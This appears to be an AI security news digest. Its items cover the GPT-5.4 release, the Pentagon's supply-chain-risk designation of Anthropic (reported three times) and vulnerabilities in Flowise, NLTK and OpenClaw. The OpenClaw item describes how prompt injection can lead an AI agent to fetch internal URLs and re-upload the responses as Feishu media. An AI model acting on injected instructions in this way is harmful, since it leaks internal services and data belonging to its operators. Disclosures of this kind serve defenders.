AI Sec Watch

OpenAI released GPT-5.4 and GPT-5.4-pro, two new AI models with a 1 million token context window (the amount of text the model can consider at once) and an August 31st, 2025 knowledge cutoff. The models are priced slightly higher than the previous GPT-5.2 family and show significant improvements on business tasks like spreadsheet modeling, achieving 87.3% accuracy compared to 68.4% for GPT-5.2.

The US Defense Department has officially labeled Anthropic (maker of Claude, an AI assistant) a 'supply-chain risk,' which will prevent defense contractors from using Claude in products made for the government. This escalates a dispute between the Pentagon and Anthropic over their policies on acceptable uses of the AI, and may lead to legal action.

OpenClaw versions before 2026.2.14 have a server-side request forgery vulnerability (SSRF, where an attacker tricks a server into making requests to unintended targets) in the Feishu extension that allows attackers to fetch remote URLs and access internal services through the sendMediaFeishu function and markdown image processing. Attackers can exploit this by manipulating tool calls or using prompt injection (tricking the AI by hiding instructions in its input) to trigger these requests and re-upload the responses as Feishu media.

The US Pentagon has officially labeled Anthropic, an AI company, as a supply chain risk, marking the first time the government has given this designation to a US firm. This decision stems from Anthropic's refusal to give the military unrestricted access to its AI tools, citing concerns about mass surveillance and autonomous weapons development. The designation prohibits any company working with the military from conducting business with Anthropic.

Flowise's forgot-password endpoint leaks personally identifiable information (PII: sensitive data like names and account IDs that identify individuals) to anyone who knows a valid email address, because it returns the full user object instead of a generic success message. An attacker can exploit this by sending a simple request to `/api/v1/account/forgot-password` with any email address and receive back user IDs, names, creation dates, and other account details without needing to log in.

AWS launched Amazon Connect Health, an AI agent-powered platform (software that completes complex tasks automatically) designed to help healthcare organizations automate administrative work like appointment scheduling and patient records. The platform is HIPAA-eligible (meets healthcare privacy and security standards) and integrates with existing electronic health record systems, marking AWS's first major AI agent product in a regulatory-compliant healthcare offering.

Flowise uses an insufficiently weak password hashing setting where bcrypt (a password encryption algorithm) is configured with only 5 salt rounds, which provides just 32 iterations compared to OWASP's recommended minimum of 10 rounds (1024 iterations). This weakness means that if a database is stolen, attackers can crack user passwords roughly 30 times faster using modern GPUs, putting all user accounts at risk.

NLTK (Natural Language Toolkit, a Python library for text processing) versions 3.9.2 and earlier have a serious vulnerability in the StanfordSegmenter module, which loads external Java files without checking if they are legitimate. An attacker can trick the system into running malicious code by providing a fake Java file, which executes when the module loads, potentially giving them full control over the system.

The U.S. Department of Defense has officially designated Anthropic, an AI company, as a supply-chain risk (a classification usually reserved for foreign adversaries), requiring any organization working with the Pentagon to certify it doesn't use Anthropic's products. This designation came after Anthropic CEO Dario Amodei refused to allow the military to use the company's AI systems for mass surveillance of Americans or to power fully autonomous weapons with no human involvement in targeting decisions. The move is threatening Anthropic's operations, especially since the military currently relies on Anthropic's Claude AI for operations in the Middle East and other classified work.